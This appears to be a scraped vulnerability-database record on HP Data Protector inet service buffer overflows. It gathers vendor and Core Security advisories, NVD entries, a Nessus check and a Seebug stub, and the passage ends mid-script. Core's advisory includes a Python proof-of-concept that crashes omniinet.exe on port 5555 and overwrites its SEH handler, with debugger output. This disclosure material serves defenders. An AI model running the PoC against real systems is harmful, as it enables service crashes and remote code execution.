Hardware and Firmware\r\n MP = MPE/iX\r\n MU = Multi-Platform Software\r\n NS = NonStop Servers\r\n OV = OpenVMS\r\n PI = Printing and Imaging\r\n PV = ProCurve\r\n ST = Storage Software\r\n TU = Tru64 UNIX\r\n UX = HP-UX\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system\r\nintegrity. HP is continually reviewing and enhancing the security features of software products\r\nto provide customers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users\r\nof the affected HP products the important security information contained in this Bulletin. HP\r\nrecommends that all users determine the applicability of this information to their individual\r\nsituations and take appropriate action. HP does not warrant that this information is\r\nnecessarily accurate or complete for all user situations and, consequently, HP will not be\r\nresponsible for any damages resulting from user's use or disregard of the information provided\r\nin this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express\r\nor implied, including the warranties of merchantability and fitness for a particular purpose,\r\ntitle and non-infringement."\r\n\r\nCopyright 2011 Hewlett-Packard Development Company, L.P.\r\n\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions\r\ncontained herein. The information provided is provided "as is" without warranty of any kind. \r\nTo the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will\r\nbe liable for incidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or services; or damages for\r\nloss of data, or software restoration. The information in this document is subject to change\r\nwithout notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and other countries.\r\nOther product and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk4Lun4ACgkQ4B86/C0qfVlnbQCgrHWQHFYB5Gux1C5M7OiPW+Q+\r\n2XUAn3tiNudYuuArpTtX4IQdOA/G1a4f\r\n=BrzP\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-07-06T00:00:00", "published": "2011-07-06T00:00:00", "id": "SECURITYVULNS:DOC:26620", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26620", "title": "[security bulletin] HPSBMU02686 SSRT100541 rev.3 - HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "cvelist": ["CVE-2011-1866"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - Corelabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n HP Data Protector EXEC_CMD Buffer Overflow Vulnerability\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability\r\nAdvisory ID: CORE-2011-0606\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/HP-Data-Protector-EXECCMD-Vulnerability\r\nDate published: 2011-06-29\r\nDate of last update: 2011-06-29\r\nVendors contacted: HP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Remote stack overflow [CWE-120]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1866\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nHP Data Protector [1] is an automated backup and recovery software for\r\nsingle-server to enterprise environments. A vulnerability in HP Data\r\nProtector could allow a remote attacker to execute arbitrary code. The\r\nvulnerability is triggered by sending a request to port 5555 of a host\r\nrunning the "data protector inet" service, part of HP Data Protector.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\r\n . Previous versions may be affected, but were not tested.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . No fixes are available at the time of publication.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nHP has issued a security bulletin with document ID c02872182 [2]\r\navailable through HP Support Center at http://www.hp.com/go/HPSC.\r\n\r\nThe latest version of HP Data Protector is vulnerable to this issue. HP\r\nhas provided the following procedure to mitigate this vulnerability:\r\n\r\n 1. Upgrade to Data Protector A.06.20 or subsequent.\r\n 2. Enable encrypted control communication services on cell server and\r\nall clients in cell.\r\n\r\n The upgrade is available for download from\r\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\r\n'Trials and Demos'.\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered and researched by Nahuel C. Riva from\r\nCore Security Technologies. Publication was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\nThe following python script can be used to reproduce the bug.\r\n\r\n/-----\r\nimport sys\r\nimport socket\r\n\r\nfrom struct import pack\r\n\r\nip = sys.argv[1]\r\nport = int(sys.argv[2]) # default tcp port 5555\r\n\r\ntarget = (ip, port)\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(target)\r\n\r\npath = 'A' * 5000\r\n\r\npacket = pack('<L', 0x20003220)\r\npacket += pack('<L', 0x00302000)\r\npacket += '\x20'\r\npacket += pack('>H', 0x0020)\r\npacket += pack('<L', 0x00432000)\r\npacket += pack('<L', 0x00303220)\r\npacket += '\x20'\r\npacket += 'omnicheck.exe'\r\npacket += pack('>H', 0x0020)\r\npacket += pack('>H', 0x0020) * 4\r\npacket += pack('<L', 0x30200030)\r\npacket += pack('>H', 0x0020)\r\npacket += path\r\npacket += pack('>H', 0x0000)\r\n\r\nplen = pack('>L', len(packet))\r\n\r\ns.send(plen + packet)\r\n\r\n- -----/\r\n By executing this script, the omniinet.exe process crashes in the\r\nfollowing EIP:\r\n\r\n/-----\r\n7C8285D3 8B0424 MOV EAX,DWORD PTR SS:[ESP]\r\n7C8285D6 8BE5 MOV ESP,EBP\r\n7C8285D8 5D POP EBP\r\n7C8285D9 C3 RETN\r\n \r\n- -----/\r\n This is part of a function inside the ntdll.dll library, however, if we\r\nlook the SEH chain, we can see that the SEH handler was overwritten with\r\nthe value 0x00410041 (the unicode value for "AA"):\r\n\r\n/-----\r\nSEH chain of thread 00000578\r\nAddress SE handler\r\n009AFF94 omniinet.00410041\r\n00410041 A3004472\r\n \r\n- -----/\r\n The following are the values of the CPU registers at the time of the\r\ncrash:\r\n\r\n/-----\r\nEAX C0000008\r\nECX 009AEC98\r\nEDX 7C82859C ntdll.KiRaiseUserExceptionDispatcher\r\nEBX 0015B480\r\nESP 009AEC44\r\nEBP 009AEC94\r\nESI 00155A80\r\nEDI 00000000\r\nEIP 7C8285D3 ntdll.7C8285D3\r\nC 0 ES 0023 32bit 0(FFFFFFFF)\r\nP 1 CS 001B 32bit 0(FFFFFFFF)\r\nA 0 SS 0023 32bit 0(FFFFFFFF)\r\nZ 0 DS 0023 32bit 0(FFFFFFFF)\r\nS 0 FS 003B 32bit 7FFDB000(FFF)\r\nT 0 GS 0000 NULL\r\nD 0\r\nO 0 LastErr ERROR_SUCCESS (00000000)\r\nEFL 00000206 (NO,NB,NE,A,NS,PE,GE,G)\r\nST0 empty 0.0\r\nST1 empty 0.0\r\nST2 empty 0.0\r\nST3 empty 0.0\r\nST4 empty 0.0\r\nST5 empty 0.0\r\nST6 empty 0.7610000000000000098\r\nST7 empty 1.0000000000000000000\r\n 3 2 1 0 E S P U O Z D I\r\nFST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)\r\nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1\r\n \r\n- -----/\r\n The problem is in the 0041D170 function. This function does a blind\r\ncopy of the string passed in the packet as a path:\r\n\r\n/-----\r\n0041D170 /$ 55 PUSH EBP\r\n0041D171 |. 8BEC MOV EBP,ESP\r\n0041D173 |. 51 PUSH ECX\r\n0041D174 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]\r\n0041D177 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX\r\n0041D17A |. 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]\r\n0041D17D |. 0FB711 MOVZX EDX,WORD PTR DS:[ECX]\r\n0041D180 |. 85D2 TEST EDX,EDX\r\n0041D182 |. 74 73 JE SHORT omniinet.0041D1F7\r\n[...]\r\n0041D1F7 |> 8B45 0C /MOV EAX,DWORD PTR SS:[EBP+C]\r\n0041D1FA |. 0FB708 |MOVZX ECX,WORD PTR DS:[EAX]\r\n0041D1FD |. 85C9 |TEST ECX,ECX\r\n0041D1FF |. 74 26 |JE SHORT omniinet.0041D227\r\n0041D201 |. 8B55 08 |MOV EDX,DWORD PTR SS:[EBP+8]\r\n0041D204 |. 8955 FC |MOV DWORD PTR SS:[EBP-4],EDX\r\n0041D207 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8]\r\n0041D20A |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C]\r\n0041D20D |. 66:8B11 |MOV DX,WORD PTR DS:[ECX]\r\n0041D210 |. 66:8910 |MOV WORD PTR DS:[EAX],DX // copy WORDs\r\nto the stack\r\n0041D213 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8]\r\n0041D216 |. 83C0 02 |ADD EAX,2\r\n0041D219 |. 8945 08 |MOV DWORD PTR SS:[EBP+8],EAX\r\n0041D21C |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C]\r\n0041D21F |. 83C1 02 |ADD ECX,2\r\n0041D222 |. 894D 0C |MOV DWORD PTR SS:[EBP+C],ECX\r\n0041D225 |.^EB D0 \JMP SHORT omniinet.0041D1F7\r\n0041D227 |> 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]\r\n0041D22A |. 66:C702 0000 MOV WORD PTR DS:[EDX],0\r\n0041D22F |. 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]\r\n0041D232 |. 8BE5 MOV ESP,EBP\r\n0041D234 |. 5D POP EBP\r\n0041D235 \. C3 RETN\r\n \r\n- -----/\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n 2011-06-06:\r\nCore Security Technologies notifies the HP team of the vulnerabilities\r\nand provides the technical details. Publication date is temporarily set\r\nto July 5th, 2011.\r\n\r\n 2011-06-06:\r\nVendor confirms that a new case was assigned within HP Software Security\r\nResponse Team (SSRT).\r\n\r\n 2011-06-16:\r\nCore requests an update on this issue, in particular Core asks the\r\nvendor for a technical analysis of the bugs, a list of affected products\r\nand versions, and the vendor's plan for providing a fix (no reply\r\nreceived).\r\n\r\n 2011-06-23:\r\nCore requests once more an update.\r\n\r\n 2011-06-28:\r\nVendor communicates that a security bulletin will be issued on the same\r\nday (June 28). The vendor confirms the vulnerabilities, and recommends\r\nas mitigation to enable encrypted communications in the cell server and\r\nclient.\r\n\r\n 2011-06-28:\r\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\r\nhave been assigned.\r\n\r\n 2011-06-28:\r\nVendor provides a link to the bulletin and CVE names for the\r\nvulnerabilities.\r\n\r\n 2011-06-29:\r\nAdvisory CORE-2011-0606 is published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] HP Data Protector http://hp.com/go/dataprotector\r\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\r\nRemote Execution of Arbitrary Code\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2011 Core Security\r\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\n\r\niEYEARECAAYFAk4LnZsACgkQyNibggitWa07/ACfSlzkBvbowAskeP/K4FqtxCay\r\nEAkAnRCPKdc35t5Cb0ZJbGy4me4JRALo\r\n=zHon\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-07-06T00:00:00", "published": "2011-07-06T00:00:00", "id": "SECURITYVULNS:DOC:26622", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26622", "title": "CORE-2011-0606: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2020-10-03T11:39:27", "description": "Multiple stack-based buffer overflows in the inet service in HP OpenView Storage Data Protector 6.00 through 6.20 allow remote attackers to execute arbitrary code via a request containing crafted parameters.", "edition": 3, "cvss3": {}, "published": "2011-07-01T10:55:00", "title": "CVE-2011-1865", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1865"], "modified": "2017-08-17T01:34:00", "cpe": ["cpe:/a:hp:openview_storage_data_protector:6.11", "cpe:/a:hp:openview_storage_data_protector:6.10", "cpe:/a:hp:openview_storage_data_protector:6.20", "cpe:/a:hp:openview_storage_data_protector:6.00"], "id": "CVE-2011-1865", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1865", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:openview_storage_data_protector:6.20:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.11:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.00:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.10:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:39:27", "description": "Buffer overflow in omniinet.exe in the inet service in HP OpenView Storage Data Protector 6.00 through 6.20 allows remote attackers to execute arbitrary code via a crafted request, related to the EXEC_CMD functionality.", "edition": 3, "cvss3": {}, "published": "2011-07-01T10:55:00", "title": "CVE-2011-1866", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1866"], "modified": "2018-10-09T19:32:00", "cpe": ["cpe:/a:hp:openview_storage_data_protector:6.11", "cpe:/a:hp:openview_storage_data_protector:6.10", "cpe:/a:hp:openview_storage_data_protector:6.20", "cpe:/a:hp:openview_storage_data_protector:6.00"], "id": "CVE-2011-1866", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1866", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:openview_storage_data_protector:6.20:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.11:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.00:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.10:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:39:26", "description": "The inet service in HP OpenView Storage Data Protector 6.00 through 6.20 allows remote attackers to cause a denial of service (daemon exit) via a request containing crafted parameters.", "edition": 4, "cvss3": {}, "published": "2011-07-01T10:55:00", "title": "CVE-2011-1515", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1515"], "modified": "2019-10-09T23:02:00", "cpe": ["cpe:/a:hp:openview_storage_data_protector:6.11", "cpe:/a:hp:openview_storage_data_protector:6.10", "cpe:/a:hp:openview_storage_data_protector:6.20", "cpe:/a:hp:openview_storage_data_protector:6.00"], "id": "CVE-2011-1515", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1515", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:hp:openview_storage_data_protector:6.20:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.11:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.00:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.10:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:39:26", "description": "The inet service in HP OpenView Storage Data Protector 6.00 through 6.20 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request containing crafted parameters.\nPer: http://cwe.mitre.org/data/definitions/476.html\r\n'CWE-476: NULL Pointer Dereference'", "edition": 4, "cvss3": {}, "published": "2011-07-01T10:55:00", "title": "CVE-2011-1514", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1514"], "modified": "2019-10-09T23:02:00", "cpe": ["cpe:/a:hp:openview_storage_data_protector:6.11", "cpe:/a:hp:openview_storage_data_protector:6.10", "cpe:/a:hp:openview_storage_data_protector:6.20", "cpe:/a:hp:openview_storage_data_protector:6.00"], "id": "CVE-2011-1514", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1514", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:hp:openview_storage_data_protector:6.20:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.11:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.00:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.10:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-01-01T03:15:31", "description": "The version of HP Data Protector installed on the remote Windows host\nis affected by one or more of the following vulnerabilities :\n\n - Multiple denial of service vulnerabilities exist in the\n 'data protect inet' service. (CVE-2011-1514, \n CVE-2011-1515)\n\n - A buffer overflow vulnerability exists in the 'data\n protector inet' service that can be exploited via \n EXEC_CMD. (CVE-2011-1864)\n\n - A buffer overflow vulnerability exists in the inet\n service that could result in code execution via a \n request containing crafted parameters. (CVE-2011-1865)", "edition": 26, "published": "2011-07-11T00:00:00", "title": "HP Data Protector <= A.06.20 Multiple Vulnerabilities (credentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865", "CVE-2011-1864", "CVE-2011-1866"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:hp:storage_data_protector"], "id": "HP_DATA_PROTECTOR_0620_MULTIPLE_VULNS_CREDS.NASL", "href": "https://www.tenable.com/plugins/nessus/55551", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55551);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\n \"CVE-2011-1514\",\n \"CVE-2011-1515\",\n \"CVE-2011-1865\", \n \"CVE-2011-1866\"\n );\n script_bugtraq_id(48486, 48488);\n script_xref(name:\"Secunia\", value:\"45100\");\n\n script_name(english:\"HP Data Protector <= A.06.20 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks if encrypted control communication services is enabled.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of HP Data Protector installed on the remote Windows host\nis affected by one or more of the following vulnerabilities :\n\n - Multiple denial of service vulnerabilities exist in the\n 'data protect inet' service. (CVE-2011-1514, \n CVE-2011-1515)\n\n - A buffer overflow vulnerability exists in the 'data\n protector inet' service that can be exploited via \n EXEC_CMD. (CVE-2011-1864)\n\n - A buffer overflow vulnerability exists in the inet\n service that could result in code execution via a \n request containing crafted parameters. (CVE-2011-1865)\");\n\n # http://www.coresecurity.com/content/HP-Data-Protector-EXECCMD-Vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d655681\");\n # http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?79bee660\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0e38ce76\");\n script_set_attribute(attribute:\"solution\", value:\n\"1. Upgrade to Data Protector A.06.20 or later and\n\n2. Enable encrypted control communication services on cell server and\n all clients in cell.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-12-076\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe Opcode 20 Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/06/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:storage_data_protector\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"hp_data_protector_installed_local.nasl\");\n script_require_keys(\"SMB/HP Data Protector/Version\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit('SMB/HP Data Protector/Version');\nencrypted_comm = get_kb_item_or_exit('SMB/HP Data Protector/Encrypted');\nverui = get_kb_item('SMB/HP Data Protector/VersionUI');\ntype = get_kb_item('SMB/HP Data Protector/Type');\npath = get_kb_item('SMB/HP Data Protector/Path');\n\nif (encrypted_comm) encrypted_comm = 'True';\nelse encrypted_comm = 'False';\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n ver[0] < 6 || \n (ver[0] == 6 && ver[1] < 20) ||\n (ver[0] == 6 && ver[1] == 20 && encrypted_comm == 'False')\n)\n{\n if (report_verbosity > 0)\n {\n report = \n '\\n Path : ' + path + \n '\\n Install type : ' + type +\n '\\n Encryption : ' + encrypted_comm + \n '\\n Installed version : ' + verui +\n '\\n Fixed version : A.06.20 with encrypted control communications services \\n';\n security_hole(port:get_kb_item('SMB/transport'), extra:report);\n }\n else security_hole(get_kb_item('SMB/transport'));\n exit(0);\n}\nelse exit(0, 'The HP Data Protector '+verui+' install is not affected.');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T15:46:26", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "HP Data Protector 6.20 - Multiple Vulnerabilities", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1514", "CVE-2011-1515", "CVE-2011-1865"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71823", "id": "SSV:71823", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - Corelabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n Multiple vulnerabilities in HP Data Protector\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Multiple vulnerabilities in HP Data Protector\r\nAdvisory ID: CORE-2011-0514\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\r\nDate published: 2011-06-29\r\nDate of last update: 2011-06-29\r\nVendors contacted: HP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Remote stack overflow [CWE-120], Null pointer dereference\r\n[CWE-476], Improper input validation [CWE-20]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nHP Data Protector [1] is an automated backup and recovery software for\r\nsingle-server to enterprise environments. Multiple vulnerabilities have\r\nbeen found in HP Data Protector that could allow a remote attacker to\r\nexecute arbitrary code and lead to denial of service conditions. The\r\nvulnerabilities are triggered by sending a request to port 5555 of a\r\nhost running the "data protector inet" service, part of HP Data\r\nProtector. The request has several parameters, including an opcode. By\r\nsending requests with specially crafted parameters, the different bugs\r\ncan be triggered.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\r\n . Previous versions may be affected, but were not tested.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . No fixes are available at the time of publication.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nHP has issued a security bulletin with document ID c02872182 [2]\r\navailable through HP Support Center at http://www.hp.com/go/HPSC.\r\n\r\nThe latest version of HP Data Protector is vulnerable to these issues.\r\nHP has provided the following procedure to mitigate these vulnerabilities:\r\n\r\n 1. Upgrade to Data Protector A.06.20 or subsequent.\r\n 2. Enable encrypted control communication services on cell server and\r\nall clients in cell.\r\n\r\n The upgrade is available for download from\r\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\r\n'Trials and Demos'.\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered by Oren Isacson from Core Security\r\nTechnologies. Publication was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\nThe following python script can be used to reproduce the different bugs.\r\n\r\n/-----\r\nimport struct, socket, sys\r\n\r\ntarget = 